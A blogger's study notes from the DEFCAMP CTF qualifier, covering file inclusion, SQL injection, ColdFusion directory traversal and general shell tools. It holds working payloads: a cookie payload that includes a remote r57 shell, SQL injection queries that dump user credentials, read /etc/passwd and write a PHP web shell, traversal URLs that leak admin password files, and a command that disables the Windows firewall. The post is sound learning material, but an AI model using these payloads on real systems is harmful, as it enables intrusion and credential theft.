Last weekend I played some of the DEFCAMP CTF Quals. It was pretty intense. For (my own) organizational purposes, I made a list of all the technologies and vulnerabilities found in this CTF, some based on my team's game, some based on the CTF write-ups git repo.
Remote File Inclusion and Local File Inclusion Vulnerabilities
In Remote File Inclusion (RFI) an attacker can load exploits to the server. An attacker can use RFI to run exploits in both server and client sides. PHP's include() is extremely vulnerable to RFI attacks.
Local File Inclusion (LFI) is similar to RFI but only files that are currently in the server can be included. This type of vulnerability is seemed in forms for file uploading (with improper sanitation).
An example of RFI exploitation is the case where the form only accepts some type of extensions (such as JPG or PNG) but the verification is made in the client side. In this case, an attacker can tamper the HTTP requests to send shellcode (with PHP extension, for example). I've shown examples of this attack in the Natas post. There I've explained that the trick was to rename a PHP shell code to one of these safe extensions.
TimThumb and LFI
With TimThumb 1.33, an attacker is able to upload a shell by appending it to an image. All she needs to do is to have it in some online subdomain. TimThumb will store this image in a cache folder and generate an MD5 of the full path of the shell. The last step is to perform an LFI attack with the shell in this folder. Check this example of LFI exploitation.
CMS Mini and RFI
An example of RFI vulnerability in CMS Mini is explored using curl:
ApPHP and Remote Code Execution
ApPHP is a blog script. It is known for having several vulnerabilities, including remote code execution (RCE). An example of RCE exploit for ApPHP can be seen here. A good start is to check the PHP's disable_function list for stuff to hacker the server.
GET Request: ?asdf);print_r(scandir(implode($_COOKIE))=/ Cookie: 0=include
Post Request: 0=include/myfile.php Cookie: 0=http://www.r57shell.net/shell/r57.txt
Gitlist and Remote Command Execution
Gitlist is an application to browse GitHub repositories in a browser. The versions up to 5.0 are known for allowing remote attackers to execute arbitrary commands via shell, a type of command injection. Exploits for this vulnerability can be seen at hatriot, at packet storm, at 1337day, and at exploit-db.
In this CTF, the following command could be used to look for the flag:
LibreOffice's Socket Connections
LibreOffice's has a binary soffice.bin that takes socket connections on the port 2002 (in this CTF, in the VPN's localhost).
For instance, the command unoconv can be used to convert a file to a LibreOffice supported format. The flag -c opens a connection by the client to connect to an LibreOffice instance. It also can be used by the listener to make LibreOffice listen.
From the documentation, the default connection string is:
Default connection string is "socket,host=localhost,port=2002;urp;StarOffice.ComponentContext"
Therefore, you can connect to the socket and convert some document (such as /flag.txt) to a PDF for example:
$ unoconv --connection 'socket,host=127.0.0.1,port=2002;urp;StarOffice.ComponentContext' -f pdf /flag.txt
An example of a payload can be seen here.
ColdFusion and Local File Disclosure
ColdFusion is an old web application development platform. It carries its own (interpreted) language, CFM, with a Java backend.
The problem is that CFM is vulnerable to a variety of attacks, including Local File Disclosure (LFD) and SQL injection (SQLi). Adding this to the fact that ColdFusion scripts usually run on elevated privileged users, we have a very vulnerable platform.
SQL Injection (SQLi)
SQL Injection is a classic attack where one injects exploits in a SQL query. Vulnerabilities of this type can be spotted in queries such as index.php?id=1. I showed some of these exploits in my Natas post.
In this CTF, these were some of the exploits that could be used:
- List everything in a database, where 0x3a is the hexadecimal symbol for ::
UNION ALL SELECT 1,concat(username,0x3a,password,0x3a,email),3 FROM cms.users--
- See the password file content:
UNION ALL SELECT 1,LOAD_FILE("/etc/passwd"),3--
- Write files and create a PHP shell into URL/shell.php, we can use a parameter x to takes a parameter to be executed (based on this):
UNION ALL SELECT 1 "<?php header("Content-Type: text/plain;charset=utf-8"); echo system($-GET["x"]); ?>',3 INTO OUTFILE '/var/www/html/shell.php"--
Notice the trailing pair of hyphens -- which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed (it removes the trailing single-quote left over from the modified query). To learn more about how to mitigate SQLi, I recommend OWASP's SQLi Prevention Cheat Sheet and this nice guide for SQLi mitigation by OWSAP OWTF.
By the way, it's useful in general to know HTML URL Encoding to craft these URLs.
CesarFTP 0.99g and Buffer Overflow
File Disclosure of Password Hashes
This vulnerability provides a 30-second window in the Administration panel, which can e use to write a shellcode. The main idea is a directory traversal to the password.proprieties that can be used to login in the server.
Ingredients of this attack are:
The target must have ColdFusion administrator available, which is by default mapped to CFIDE/administrator/enter.cfm. If it gets 500, it should be switched to HTTPS.
At the ColdFusion administrator, verify the version, and then use these injections:
(Version 6): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en (Version 7): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en (Version 8): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en (All versions): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en
- Now a shell can be written to a file and added in Schedule New Task. See detailed instructions at blackhatlib, at infointox, at gnucitizen, at kaoticcreations, at cyberguerilla, at jumpespjump, and at hexale.
Vulnerability scanners can be useful for several problems. For instance, for a PHP static source code analyzer, we can use RIPS.
Scapy is a Python lib for crafting packets. It can be useful for problems such as port knocking. For illustration, check this example from PHD CTF 2011 and this from ASIS CTF 2014. Check this project too.
To run the tool (after downloading it) just do:
java -jar paranoia.jar
HTTP/HTTPS Request Tampering
Very useful for the RFI problems (but not limited to them):
- Tamper Data: view and modify HTTP/HTTPS headers.
- Burp: a Java application to secure or penetrate web applications.
At some point I'm going to dedicate an entire post for Wireshark, but for this CTF the important things to know were:
- Look for POST requests:
http.request.method == "POST"
- Submit the found data (same username, nonce, and password) with the command:
$ curl --data 'user=manager&nonce=7413734ab666ce02cf27c9862c96a8e7&pass=3ecd6317a873b18e7dde351ac094ee3b' HOST
Exif data extractor:
ExifTool is used for reading, writing, and manipulating image metadata:
$ tar -xf Image-ExifTool-9.74.tar.gz $ cd Image-ExifTool-9.74/ $ perl Makefile.PL $ make test $ sudo make install $ exiftool IMAGEFILE
In the Shell
- Hexadecimal decoders are essential. You can use Python's hex:
$ python -c 'print "2f722f6e6574736563".decode("hex")' /r/netsec
or command line xxd:
$ yum install vim-common $ xxd -r -p <<< 2f722f6e6574736563 /r/netsec
- Base64 decoders are also essential:
$ base64 --decode <<< BASE64STRING > OUTPUT
- nmap, obviously. You can use it in Python scripts, using the subprocess library:
print "[*] Scanning for open ports using nmap" subprocess.call("nmap -sS -sV -T4 -p 22-2048 " + base_URL, shell=True)
- tee is nice to store and view the output of another command. It can be very useful with curl. A simple example:
$ ls | tee file
chattr is used to change the file attributes of a Linux file system. For example, the command
chattr +ion a file make it not be able to be removed (useful for zombie processes hunting).
nm is useful for listing symbols from object files
md5 hashing is used all the time:
$ echo -n password | md5sum 5f4dcc3b5aa765d61d8327deb882cf99
- You might want to append a shell code to an image (for example, a GIF file):
$ cat PHP-shell.php >> fig.gif
- Now a special one: Windows! One of the trivia questions in this CTF. How to disable the Windows XP Firewall from the command line:
netsh firewall set opmode mode=DISABLE.